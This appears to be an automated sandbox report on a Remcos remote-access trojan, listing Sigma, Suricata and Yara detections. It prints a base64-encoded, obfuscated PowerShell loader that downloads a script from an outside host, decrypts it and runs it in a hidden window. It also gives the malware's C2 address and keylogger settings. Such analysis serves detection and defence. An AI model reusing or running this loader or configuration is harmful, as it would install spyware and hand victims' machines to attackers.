x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3676, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3676, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T16:44:49.861966+010020365941Malware Command and Control Activity Detected192.168.2.94970937.120.208.4056379TCP
                2025-02-11T16:44:53.955678+010020365941Malware Command and Control Activity Detected192.168.2.94971337.120.208.4056379TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T16:44:53.577506+010028033043Unknown Traffic192.168.2.949715178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T16:44:37.600161+010018100002Potentially Bad Traffic192.168.2.949708168.119.145.117443TCP
                2025-02-11T16:44:49.946301+010018100002Potentially Bad Traffic192.168.2.949710168.119.145.117443TCP
                2025-02-11T16:45:03.233536+010018100002Potentially Bad Traffic192.168.2.949717168.119.145.117443TCP
                2025-02-11T16:45:15.673663+010018100002Potentially Bad Traffic192.168.2.949718168.119.145.117443TCP
                2025-02-11T16:45:29.961363+010018100002Potentially Bad Traffic192.168.2.949719168.119.145.117443TCP
                2025-02-11T16:45:43.035106+010018100002Potentially Bad Traffic192.168.2.949721168.119.145.117443TCP
                2025-02-11T16:46:01.388292+010018100002Potentially Bad Traffic192.168.2.949722168.119.145.117443TCP
                2025-02-11T16:46:14.638230+010018100002Potentially Bad Traffic192.168.2.949723168.119.145.117443TCP
                2025-02-11T16:46:28.399978+010018100002Potentially Bad Traffic192.168.2.949724168.119.145.117443TCP
                2025-02-11T16:46:46.741684+010018100002Potentially Bad Traffic192.168.2.949725168.119.145.117443TCP
                2025-02-11T16:47:05.144589+010018100002Potentially Bad Traffic192.168.2.949726168.119.145.117443TCP
                2025-02-11T16:47:18.757406+010018100002Potentially Bad Traffic192.168.2.949727168.119.145.117443TCP
                2025-02-11T16:47:42.736383+010018100002Potentially Bad Traffic192.168.2.949728168.119.145.117443TCP
                2025-02-11T16:48:01.631421+010018100002Potentially Bad Traffic192.168.2.949729168.119.145.117443TCP
                2025-02-11T16:48:20.935576+010018100002Potentially Bad Traffic192.168.2.949730168.119.145.117443TCP
                2025-02-11T16:48:40.919842+010018100002Potentially Bad Traffic192.168.2.949731168.119.145.117443TCP
                2025-02-11T16:48:54.752947+010018100002Potentially Bad Traffic192.168.2.949732168.119.145.117443TCP
                2025-02-11T16:49:08.244496+010018100002Potentially Bad Traffic192.168.2.949733168.119.145.117443TCP
                2025-02-11T16:49:21.593622+010018100002Potentially Bad Traffic192.168.2.949734168.119.145.117443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 10.2.powershell.exe.8a71288.4.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
